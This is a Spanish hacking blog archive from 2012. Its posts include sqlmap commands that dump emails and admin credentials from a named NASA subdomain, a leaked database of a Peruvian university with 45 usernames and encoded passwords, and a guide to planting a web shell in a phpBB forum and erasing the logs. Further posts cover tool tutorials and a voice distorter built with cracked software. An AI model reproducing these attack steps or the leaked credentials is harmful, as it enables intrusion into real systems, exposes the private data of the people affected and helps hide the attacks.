jueves, 28 de junio de 2012

SQL Injection en Sitio Oficial de la NASA


Hola, pues en esta entrada colocare algunas fotos de la Inyeccion SQL que realize a unos de los sub-dominios oficiales de la NASA, el bug lo encontré realizando unos testos a dichos sub-dominios, la cual fue en Marzo de este año.

Colocare las fotos con el fin de que ustedes vean que los sitios oficiales de la NASA no son tan seguros como aparentan ser, es por eso que algunos Hackers Chinos en el año 2011 lograron vulnerar el sitio oficial y también tomaron el control de los servidores de dicha organización.

Cabe resaltar que todo lo que publicare en esta entrada, ha sido respectivamente reportada a la NASA en su debido tiempo y tampoco es con el fin de desprestigiar a la misma.

#################################################################################
Sitio web : http://ipp.gsfc.nasa.gov/
Link Vulnerable : /optimus/voting.php?id=70'
Vulnerabilidad: SQL Injection
Estado: Reportado
#################################################################################

Vulnerabilidad:


Explotando Vulnerabilidad desde el SQLMAP:

Base de Datos:
./sqlmap.py -u http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 --dbs



Tablas:
./sqlmap.py -u  http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog --tables




Columnas:
./sqlmap.py -u  http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T hermes_users --columns



E-mails:
./sqlmap.py -u  http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T hermes_users -C email --dump


Nombres:
./sqlmap.py -u  http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T hermes_users -C name --dump


Columna "authors":
./sqlmap.py -u  http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T authors --columns



























Usuario Admin:
./sqlmap.py -u  http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T authors -C username --dump


























Password Admin:
./sqlmap.py -u  http://ipp.gsfc.nasa.gov/optimus/voting.php?id=70 -D ipp_blog -T authors -C password --dump



Los datos las publique en algunos PASTEBIN, y se extendio rápidamente en foros de otros paises.

Saludos.

John the Ripper Version GUI




La versión de la interfaz gráfica para el John The Ripper (JTR), fue propuesto por Shinnok. Johnny es un concepto de interfaz gráfica de usuario de John the Ripper escrito en C++ utilizando el framework Qt, por lo que es multiplataforma tanto en Unix/Linux y sistemas operativos de Windows.

Johnny está en desarrollo. El desarrollo fue iniciado como parte de Verano de Seguridad 2011 por Aleksey Cherepanov, mientras que Shinnok se convirtió en un mentor para Aleksey.

Esta versión de interfaz gráfica será muy útil para aquellos que luchan con la herramienta de línea de comandos.

Descargar:

Crackear Hash MD5 con BozoCrack



BozoCrack es un eficaz herramienta para crackear contraseñas en Hash MD5 que no usa mucho el CPU/GPU. En lugar de diccionarios o fuerza bruta, BozoCrack limita a declarar la contraseña en texto plano. En concreto, se googlea el hash MD5 y los resultados aparece en texto en algún lugar de la primera página de resultados. BozoCrack esta programado en Ruby.

Descargamos la Tool: https://github.com/juuso/BozoCrack

1) Descargar & descomprimir:
root@bt:~# cd Desktop
root@bt:~/Desktop# unzip juuso-BozoCrack-4a55c97.zip
Archive:  juuso-BozoCrack-4a55c97.zip
4a55c971dfde938ca5acd56226965d18893bf23c
   creating: juuso-BozoCrack-4a55c97/
  inflating: juuso-BozoCrack-4a55c97/README.md  
  inflating: juuso-BozoCrack-4a55c97/bozocrack.rb  
root@bt:~/Desktop#

2) Encryptar un texto:
Nos dirigimos a: http://md5encryption.com/ colocamos un texto & lo encryptamos:













El texto que coloque es: administrator & el MD5 es: 200ceb26807d6bf99fd6f4f0d1ca54d4

3) Copiar el texto en un archivo:
Entramos a la carpeta descomprimida "juuso-BozoCrack-4a55c97" crear un archivo vacio con cualquier nombre, dentro del archivo colocamos el MD5 200ceb26807d6bf99fd6f4f0d1ca54d4 & lo guardamos en extension .txt










4) Copiamos la carpeta:
Nos dirigimos al escritorio (en mi caso) copiamos toda la carpeta & lo pegamos en sistema de archivos - pentest - passwords

5) Ejecutamos la Tool:
root@bt:~# cd /pentest/passwords
root@bt:/pentest/passwords# ls
cewl     findmyhash       john                     oclhashcat-lite  sucrack
chntpw   hashcat          juuso-BozoCrack-4a55c97  pack             wce
cmospwd  hashcat-gui      keimpx                   patator          wordlists
crunch   hashcat-utils    oclhashcat               pipal
cupp     hash-identifier  oclhashcat+              sipcrack
root@bt:/pentest/passwords# cd juuso-BozoCrack-4a55c97
root@bt:/pentest/passwords/juuso-BozoCrack-4a55c97# ls
bozocrack.rb  md5.txt  README.md
root@bt:/pentest/passwords/juuso-BozoCrack-4a55c97# ruby bozocrack.rb md5.txt
Loaded 1 unique hashes
200ceb26807d6bf99fd6f4f0d1ca54d4:administrator
root@bt:/pentest/passwords/juuso-BozoCrack-4a55c97#

Como podemos apreciar en este tutorial, vemos claramente que los pasos a seguir son faciles; si queremos desencryptar mas de 1, solo agregamos los MD5 al archivo md5.txt

Espero les guste.

Saludos...

miércoles, 27 de junio de 2012

Subir Shell en Foros PHPBB


Hola, hoy vamos a ver como subir nuestra shell en foros PHPBB, como sabemos, teniendo una shell podemos tener todo el control de un sitio web.

Empecemos:

Entramos al link del panel admin: http://site.com/adm/index.php
Una vez que tengamos acceso de administrador, vamos hasta el final del foro:

Como podemos ver, si la cuenta tiene acceso de administrador, podemos ver el enlace del panel de administración

Si logramos ingresar como administrador del foro podemos apreciar el panel:


En la ficha configuración, vamos hacia abajo para la configuración de seguridad:


Ahora vamos hacia abajo para permitir el PHP en las plantillas, aseguremos de que esta opción este activada en YES.

Ahora vamos a la pestaña de estilos, en Componentes de Estilo, hacemos clic en Plantillas:



Nos mostrara las plantillas instaladas, hacemos clic en editar en la parte superior:


Ahora, bajo la plantilla seleccionada, seleccionams faq_body.html:


Imagen de la edicion de faq_body.html:

Copiamos todo el texto & lo guardamos en archivo .txt


Ahora, borramos todo & pegamos este codigo:
<!-- PHP -->

phpinfo();

<!-- ENDPHP -->




Clickeamos en Submit:


Ahora nos dirigimos a la pagina FAQ:
http://www.site.com/faq.php



Ahora sabemos que podemos ejecutar comandos remotos & generar nuestra shell.

Regresamos a donde hemos editado el archivo, y reemplazar phpinfo (); con nuestro codigo de la shell


Ahora nos dirigimos otra vez a la pagina FAQ & nuestra shell estara ahí :)


Ahora borramos todos los logs para no dejar rastros:


Ahora podemos ir a la shell & hacer lo que querramos.

Saludos.  


martes, 26 de junio de 2012

[Base de Datos] - Universidad Tecnológica del Perú UTP


Hola, hey tu "Hacker" de la UTP todo bien? Te gustaría ver algo? Queres ver tus nombres completos con tus notas? Pues esta entrada te interesara mucho creeme...

Pues bien, esta vez hablaremos de la tan famosa Universidad Tecnológica del Perú UTP, la cual he escuchado a muchas personas que se creen Dios por estudiar en esta "super" universidad, pero en lo personal a todos esos "INFORMÁTICOS" quiero decirles que su dinero y su inteligencia son un granito de arena en mi cerebro, por lo tanto expondré toda la Base de Datos de esta Universidad.

¿Por que lo hago?

Para que todas esas personas super "Hackers" que estudian ahí vean que su tan "digna" Universidad no les brinda la seguridad que deberían brindarle y así dejen de creerse algo que no son.

Ahora bien, hablemos de la Universidad... yo me pregunto ¿Una Universidad lleno de "INFORMÁTICOS" no tienen el suficiente conocimiento como para ver si su pagina web es vulnerable o no? o solo les interesa el dinero? o solo aparentan algo que no son? o exponen toda su base de datos a cualquier persona?

Creo yo, que no tienen el suficiente conocimiento como para que tengan una web digna de respetar y así el nombre de esta Universidad quede como muchos lo mencionan... "la mejor".

Ahora veamos de que tanto hablo....

La pagina web de esta Universidad tiene muchas vulnerabilidades, la cual permite a cualquier persona que sepa explotar algun bug, llegue a obtener toda la base de datos, como yo lo hare en estos momentos.

PAGINA OFICIAL: http://www.utp.edu.pe/
VULNERABILIDAD: Interger Overflow 

No sabes que es Interger Overflow? OWASP te ayudara: https://www.owasp.org/index.php/Integer_overflow

Con esta vulnerabilidad podemos explotarla, como un simple Inyeccion SQL, la cual yo lo hare para mostrar la DB.

BASE DE DATOS:
available databases [21]:                                                                                                                                                     
[*] Admision
[*] admsql
[*] AdventureWorks
[*] AdventureWorksDW
[*] Bancos
[*] BD_AUDITORIO
[*] BD_EPS
[*] BD_Peoplesoft
[*] BD_REG_VENTAS_PS
[*] DB_UTPPortalWeb
[*] master
[*] model
[*] msdb
[*] OnBase
[*] OnBaseUTP
[*] Repoprv
[*] Repositorio
[*] SYSBIBLIO
[*] SYSGA
[*] SYSRH
[*] tempdb

OPS.. son muchas DBS no? pues veamos la de su Pagina web, en este caso es  DB_UTPPortalWeb:

Database: DB_UTPPortalWeb                                                                                                                                                     
[36 tables]
+----------------------------+
| dbo.Banner                 |
| dbo.Banner_Home            |
| dbo.Categoria_Banner       |
| dbo.D99_Tmp                |
| dbo.Departamento           |
| dbo.Departamento1          |
| dbo.Evento_Academico       |
| dbo.Galeria_Arte           |
| dbo.Galeria_Arte_Contenido |
| dbo.Galeria_Arte_Imagen    |
| dbo.Glosario               |
| dbo.Informe                |
| dbo.Manual                 |
| dbo.Noticia_Evento         |
| dbo.Provincia              |
| dbo.Prueba_Tipo            |
| dbo.Publicacion            |
| dbo.Publicacion_Detalle    |
| dbo.Taller                 |
| dbo.Usuario                |
| dbo.V_t_clientes           |
| dbo.V_t_consultas          |
| dbo.Video_Institucional    |
| dbo.banner_publicidad      |
| dbo.contacto               |
| dbo.contenido              |
| dbo.demo                   |
| dbo.error                  |
| dbo.footable               |
| dbo.menu                   |
| dbo.norma_reglamento       |
| dbo.noticiasbk             |
| dbo.pangolin_test_table    |
| dbo.sysdiagrams            |
| dbo.tecnologia_portal      |
| dbo.telefono_seccion       |
+----------------------------+


Pues en esta DB vemos los usuarios, contenido de la web, teléfonos, noticias, informes y mucho mas... yo mostrare la tabla usuarios.


Database: DB_UTPPortalWeb                                                                                                                                                      
Table: dbo.Usuario
[5 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| Dpto_Id      | int     |
| Usuario_flag | char    |
| Usuario_Id   | int     |
| Usuario_Nom  | varchar |
| Usuario_Pass | varchar |
+--------------+---------+

Ahora veamos que hay dentro de esas tablas...


Database: DB_UTPPortalWeb
Table: dbo.Usuario
[45 entries]
+---------------------------+-----------------+
| Usuario_Nom               | Usuario_Pass    |
+---------------------------+-----------------+
| ADMHOTUR                  | vdjTSO/8        |
| ADMINISTRACIONEMPRESAS    | dloqdr`r0/      |
| ADMINISTRACIONMARKETING   | l`qjdshmf0/     |
| ADMINISTRACIONNEGOCIOS    | mdfnbhnr0/      |
| ADMINISTRACIONYFINANZAS   | ehm`my`r0/      |
| ARTEYCULTURA              | vd`qdrtbbdrretk |
| BIBLIOTECA                | ahakhbdmsq`k    |
| CEPREUTP                  | bdoqd2          |
| CIENCIASDELACOMUNICACION  | bnltmhb`bhnm2/  |
| CONTABILIDAD              | bnms`ahkhc`c16  |
| DERECHOYCIENCIASPOLITICAS | cboqh00         |
| DIRECCIONDEEGRESADOS      | chqdfqdr`cnr0/  |
| DPTOADMISION              | mdv`clhrhnm00   |
| DPTOPRENSA                | oqdmr`0         |
| DPTOSISTEMAS              | vdjTSO/8        |
| EDUCACION                 | oqn`ctksnr      |
| EXTENSIONPROFESIONAL      | k`asdbuhq       |
| FACADULTOS                | oqne`ctk00      |
| INGAERONAUTICA            | ehl``r/8        |
| INGAUTOMOTRIZ             | ehl``r/8        |
| INGDESISTEMAS             | `clvdaehhr00    |
| INGDISCOM                 | vdjTSO/8        |
| INGDISGRF                 | vdjTSO/8        |
| INGECONOMICA              | `clvdaehhr00    |
| INGELECMEC                | vdjTSO/8        |
| INGELECTRONICA            | dkdbsqnmhb`00   |
| INGINDUSTRIAL             | `clvdaehhr00    |
| INGMARITIMA               | l`qhshl`tso     |
| INGMECANICA               | ehl``r/8        |
| INGMECATRONICA            | ldb`sqnmhb`01   |
| INGNAVAL                  | m`u`ktso        |
| INGREDES                  | vdjTSO/8        |
| INGREDES2                 | m`u`k1//8       |
| INGSEGU                   | vdjTSO/8        |
| INGSOFTWARE               | ehl``r/8        |
| INGTELECOMUNICACIONES     | fdrshnmehss00   |
| INGTEXTIL                 | sdwshk02        |
| INSTIDAT                  | hc`s4           |
| INSTINGLES                | m`u`k1//8       |
| INSTINVESTIGACION         | m`u`k1//8       |
| MKT                       | m`u`k1//8       |
| RECURSOSHUMANOS           | m`u`k1//8       |
| RELACIONESINTERNACIONALES | qdk`hmsdq00     |
| VACADEMICO                | vdjTSO/8        |
| VICERRECTORADO            | vdjTSO/8        |
+---------------------------+-----------------+



Queres ver mas?... pues me imagino que como sos tan "Hacker" y perteneces a esta Universidad, creo que se te hará fácil sacar toda la base de datos..

Es todo por ahora... LA VULNERABILIDAD HA SIDO REPORTADA RESPECTIVAMENTE PARA NO TENER NINGÚN PROBLEMA CON ESTA UNIVERSIDAD.

PD: Escribo esto para ayudar a esta universidad, ustedes saben a lo que me refiero...

WiPhire- Wireless Penetration Testing Tool

WiPhire es un script en bash  la cual hace que el  proceso de Hacking WIFI sea mucho más fácil y rapido.

Programas Incluidos:

- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
- airdrop-ng (Requires directory /pentest/wireless/airdrop-ng/)
- xterm
- crunch (Requires directory /pentest/passwords/crunch)
- pyrit
- sslstrip
- arpspoof
- macchanger
- kate
- apache2 (Requires directory /etc/init.d/apache2)
- ettercap
- firefox (Trivial)





Descargar:
http://sourceforge.net/projects/wiphire/files/

Saludos.

lunes, 25 de junio de 2012

Plecost: Wordpress Finger Printer Tool



Plecost recupera la información contenida en el sitio Web que se desea analizar, y además permite realizar una busqueda sobre los resultados indexados por Google. Basa su análisis en la información contenida en los ficheros de desarrollo incluidos por WordPress y sus plugins. El listado de plugins se genera en base al listado “Most populars” de wordpress.org, unido con las entradas relacionadas con WordPress en CVE.mitre.org.

Plecost esta disponible en Backtrack5, R1 & R2: Aplicaciones - Backtrack - Vulnerability Assessment - Web Aplication Assessment - CMS Vulnerability - Identification - Plecost

Plecost es capaz de trabajar en dos modos. Por un lado analizando una única URL y por otro analizando los resultados de las búsquedas de Google. Analizaremos ahora las opciones más importantes.

- Google search mode
  Recupera la información contenida en los resultados de Google en base al listado de plugin que se le 
  entrega  como entrada de datos.
- Reload plugin list
  Genera una lista de plugins a partir del listado “Most popular” de WordPress.org.
- URL mode
  Analiza la información para una sola URL indicada como parámetro.

Con esta herramienta podremos saber si los sitios webs basados en WordPress son vulnerables o no, entonces si la herramienta reconoce que el sitio es vulnerable, nos resaltara todas las vulnerabilidades con links externos de los exploits respectivos para cada vulnerabilidad.

Bien, ahora veamos como funciona.

Yo tomare una web cualquiera, ejemplo: http://santajoaquinabcn.com/

Entonces para auditarla y saber si tiene alguna vulnerabilidad, colocaremos el siguiente comando:

./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt -n 10 www.santajoaquinabcn.com

Ese comando, nos mostrara los Plugins Vulnerables en el sitio web.

Los resultados son estos:

[i] Plugin found: akismet
    |_Latest version:  2.5.6
    |_ Installed version: 2.5.6
    |_CVE list: 
    |___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)
    |___CVE-2007-2714: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2714)
    |___CVE-2006-4743: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4743)
    |___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)
    |___CVE-2007-2714: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2714)
    |___CVE-2006-4743: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4743)
      
[i] Plugin found: wptouch
    |_Latest version:  1.9.40
    |_ Installed version: 1.9.4
    |_CVE list: 
    |___CVE-2011-4803: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4803)
    |___CVE-2010-4779: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4779)
    |___CVE-2011-4803: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4803)
    |___CVE-2010-4779: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4779)
 
[i] Plugin found: nextgen-gallery
    |_Latest version:  1.9.3
    |_ Installed version: trunk
 [*] Done


Como vemos, el primer Plugin Vulnerable que nos arroja es Akismet, la cual la herramienta nos brinda la pagina donde esta el Exploit en este caso uno de los tantos es: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334


Ahora bien, con esto ya sabemos si nuestro sitio WordPress tiene vulnerabilidades para asi actualizar y parchear todo nuestro sitio web y este mas seguro.

Si desean mas informacion & descarga de esta herramienta, pueden visitar la siguiente del proyecto:

Saludos.

domingo, 24 de junio de 2012

Skipfish Web Application Security Scanner




Google, ha desarrollado una nueva herramienta gratuita para tratar de combatir los sitios que incluyen código malicioso, se trata de Skipfish, un escáner de seguridad para aplicaciones web. Esta aplicación está orientada a ser eficiente, veloz y con baja incidencia de falsos positivos. En los últimos meses, varias herramientas de seguridad web, han presentado falsos positivos. Skipfish, promete disminuir los falsos positivos a la mínima expresión, además es multiplataforma y bastante ligero. El funcionamiento de Skipfish es sumamente sencillo. Al estar activado, genera un mapa interactivo para la página web que queramos visitar; para realizar esto se apoya en un rastreo recursivo del sitio en internet y en un amplio diccionario basado en sondas. Luego, el mapa generado pasa por distintos controles de seguridad, para después, emitir un informe final, que permitirá realizar una evaluación del sitio web al que aspiramos ingresar, y detectar sus fallos de seguridad mucho antes que nos sorprendan a nosotros.

Skipfish, es una herramienta con la que se podrá visualizar rápidamente, si el sitio que se desea visitar es de bajo o alto riesgo. Además, cuenta con una amplia base de datos, que le permite ubicar vulnerabilidades conocidas para los controles de los baners, lo que hace que su informe de riesgo sea bastante completo.

Podemos encontrarla en: Aplicaciones - Backtrack - Vulnerability Assessment - Web Aplication Assessment - Web Vulnerability Scanners - Skipfish

Tambien podemos abrir la herramienta desde la consola:
root@bt:~# cd /pentest/web/skipfish
root@bt:/pentest/web/skipfish# ls
alloc-inl.h  config.h    database.h     Makefile  same_test.c  string-inl.h
analysis.c   COPYING     debug.h        o         sfscandiff   types.h
analysis.h   crawler.c   dictionaries   README    skipfish
assets       crawler.h   http_client.c  report.c  skipfish.1
ChangeLog    database.c  http_client.h  report.h  skipfish.c
root@bt:/pentest/web/skipfish# ./skipfish

Ahora tecleamos siguiente comando para empezar a scanear un sitio web:
root@bt:/pentest/web/skipfish# ./skipfish -o/pentest/web/skipfish/d -W dictionaries/complete.wl http://www.nasa.gov
La letra "d" en el comando es la carpeta que se creara con esa letra donde podemos ver los resultados del scan, tambien se puede usar cualquier letra y/o nombre; si queremos realizar otro scan solo cambiamos la letra & los resultados lo podemos ver en /pentest/web/skipfish/carpeta

Bueno, una vez ejecutado el comando para realizar el scan, nos saldra un aviso:

Podemos esperar los 60 segundos o tan solo presionamos enter & empezara el scan...

Empezado el scan, podemos apreciar todas las estadísticas:


Terminado el scan, ejecutaremos el siguiente comando para ver los resultados:
root@bt:/pentest/web/skipfish# firefox /pentest/web/skipfish/d/index.html
En este caso yo he cancelado el scan para realizar el tutorial; en si el scan puede tardar dependiendo de la velocidad de conexión.

Resultados:



Los resultados de este scan fue de 1 minuto & los resultados son muy positivos, si queremos tener un mejor resultado tenemos que esperar que el scan termine por su propia cuenta.

Informacion de la Herramienta:
http://code.google.com/p/skipfish/

Esto ha sido todo por ahora.

Saludos.


sábado, 23 de junio de 2012

NodeZero Linux




NodeZero es Ubuntu basado en Linux diseñado como un sistema completo que también puede ser utilizado para las pruebas de penetración. NodeZero usa los repositorios de Ubuntu para que su sistema estará siempre al día. La configuración del sistema es básico y es Primariamente diseñado para su instalación en disco y la personalización que desee.

Con NodeZero viene alrededor de 300 herramientas para pruebas de penetración y un conjunto de servicios básicos que se necesitan en las pruebas de penetración. También estamos preparando un repositorio de pentest herramientas para que su sistema estará actualizado en todo momento.

NodeZero se puede encontrar aquí:

Lista de las herramientas que se pueden encontrar en NodeZero Linux se puede ver aquí:

Descargar:

Demostración:

Happy Hacking !!!

viernes, 22 de junio de 2012

Distorsionando la Voz cuando Realizas una Llamada a un Movil



Hola, esta vez vamos a ver algo de móviles... en esta entrada te enseñare como distorsionar tu voz cuando realizas una llamada a cualquier celular del mundo, tu voz puede salir como robot y muchas voces mas... te gustaría hacerlo? bueno empecemos...

CONCEPTO:

Un distorsionador de voz permite recibir la señal por micrófono y sacar la señal por el parlante modificada para que la señal no pueda ser descifrada. Muchos delincuentes, secuestradores, espías y otros tipo de personas usan este método para ocultar su voz y con ello tener la seguridad de que su voz no pueda ser reconocida. Algunas personas usan la distorsión por seguridad y otras personas usan la distorsión para llevar acabo delitos y no poder ser reconocido por los agentes de la seguridad.

Para realizar este método, tenemos que usar los siguientes materiales:

MATERIALES:

Adaptador 2 entradas mini Jack RCA Estéreo:











Adaptador 3 entradas mini Jack RCA mono:















Manos libres Estéreo:













Cable RCA mini Jack:




















Teléfono móvil con entrada de audífono:



















Portátil con salida de audio:

Teniendo todos los materiales que he mencionado, solo nos faltaría tener los software con la cual realizaremos dicho metodo.

SOFTWARE:


NOTA: Estos software necesitan ser crackeados o activados mediante seriales o keygen, solo busquen el crack, keygen o serial para poder activarlo y tener acceso a su uso, aparte de usar este software tienen que configurar el sonido de su maquina para que el uso del distorsionador sea posible y funcione todo correctamente. Los materiales que se necesitan para poder hacer el distorsionador móvil se pueden conseguir todos perfectamente en una tienda Electrónica o Sonido, incluso si quieren conseguirlos mas barato pueden comprarlo en tiendas de chinos todo el material especificado no supera mas de los 5,00 euros que en dólares serian 6,28 dólares (España).

CREACIÓN DEL PROYECTO:


Una ves conseguido todos los materiales y el software indicado y con muchas ganas de trabajar nos ponemos manos a la obra y lo aremos todo ordenadamente para que nuestro proyecto salga correctamente.



1.- Descargamos e instalamos el software de nuestro mayor agrado que anteriormente le indique para mi gusto Morphovox Pro ya que es mas completo y mas Profesional.


2.- Tras la instalación de nuestro software dejamos correctamente activado, el software para que no nos de problema lo hacemos mediante el método que prefiramos ya sea mediante craqueo o mediante activación por serial.

3.- Configuramos correctamente nuestro micrófono y sonido de Windows para que no tengamos problemas a la hora de realizar nuestro proyecto.

4.- Comprobamos que nuestro teléfono móvil tenga una tarjeta SIM con saldo para poder hacer nuestra prueba y con la batería de nuestro teléfono móvil al ser posible llena.

5.- Una ves hecho correctamente los pasos anteriores encendemos nuestro ordenador y preparamos todo el material para realizar el proyecto.

6.- Conectar el macho negro del adaptador mini Jack de 2 entradas en la salida de audio de nuestra maquina.

7.- Conectar el macho negro del manos libres en una entrada del adaptador mini Jack de 2 entradas.

8.- Conectar el macho negro del cable RCA mini Jack a la otra entrada del adaptador mini Jack de 2 entradas.

9.- Conectar macho blanco del cable RCA mini Jack a la entrada de sonido amarilla del adaptador mini Jack de 3 entradas.

10.- Conectar macho rojo del cable RCA mini Jack a la entrada de sonido blanca del adaptador mini Jack de 3 entradas.

11.- La entrada que sobra de video se dejaría libre sin conectar nada.

12.- Conectar macho del adaptador mini Jack de 3 entradas en la entrada de auriculares del teléfono móvil.

13.- Una ves seguido los pasos procederíamos a probar nuestro proyecto para comprobar que todo funciona correctamente pondríamos la voz deseada en el software y una ves hecho esto llamaríamos algún teléfono móvil o fijo que estuviéramos con todo conectado y hablaríamos para comprobar su eficacia y que todo funciona correctamente.

14.- Realizando todo lo anterior y teniendo todo configurado, ya podríamos realizar la llamada a cualquier teléfono móvil y nuestra vos se escuchara como un robot o lo que hayamos elegido en el programa, solo tenemos que hablar por el auricular.

Este proyecto una vez creado es de fácil uso pero a su vez es peligroso ya que el método de distorsión de voz es muy usada para delitos de nivel alto por usar este método de distorsión de voz nunca quita la peligrosidad que esto conlleva ya que no te da anonimato absoluto y puede ser rastreada la señal mediante la frecuencia que emite los terminales móviles siendo fácil su localización pudiendo tener problemas serios con las leyes de su país.



Este proyecto esta creado por Darck-Spain con el fin del estudio , investigación , aprendizaje y la creación de métodos muy visto y usados en películas y casos reales.


Dejando este proyecto terminado con la intención de aportar conocimiento y ser de uso educativo dejo presente que este proyecto fue creado especialmente para la comunidad de CYBERLOCOS.

No me hago responsable del uso que se le pueda dar al proyecto creado ya que la persona que se disponga a su creación debe ser consciente de lo que hace y con que intenciones desea poner en practica este conocimiento.

Espero se diviertan...